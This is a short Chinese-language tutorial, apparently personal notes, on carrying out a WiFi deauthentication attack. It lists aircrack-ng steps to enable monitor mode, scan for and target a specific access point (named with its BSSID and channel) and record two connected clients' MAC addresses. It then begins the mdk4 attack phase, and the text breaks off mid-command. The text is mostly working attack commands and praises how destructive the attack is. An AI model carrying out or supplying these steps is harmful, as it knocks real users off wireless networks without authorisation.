对WiFi发动取消认证攻击(Deauthentication)
取消认证攻击是最简单的攻击手段之一,但破坏性奇高,可以轻易让无线网络环境瘫痪。
阶段一:信息收集
1. 查看网卡接口
ip addr
2. 检查并杀死冲突进程
airmon-ng check kill
3. 开启监听模式
airmon-ng start wlan0
4. 验证是否处于监听模式
airmon-ng
5. 获取目标AP信息
airodump-ng wlan0mon
目标AP:
ESSID: TPGuest-77E0
BSSID: 82:8F:1D:FB:77:E0
Channel: 1
6. 针对该AP进行监听
airodump-ng --bssid 82:8F:1D:FB:77:E0 -c 1 wlan0mon
7. 获取所连接设备MAC (可选)
设备一:E0:DC:FF:CC:0E:91
设备二:18:01:F1:B2:B3:02
阶段二:发动攻击
1. mdk4(同时进行Deauthentication 和 Disassociation)
-
针对指定客户端
mdk4 w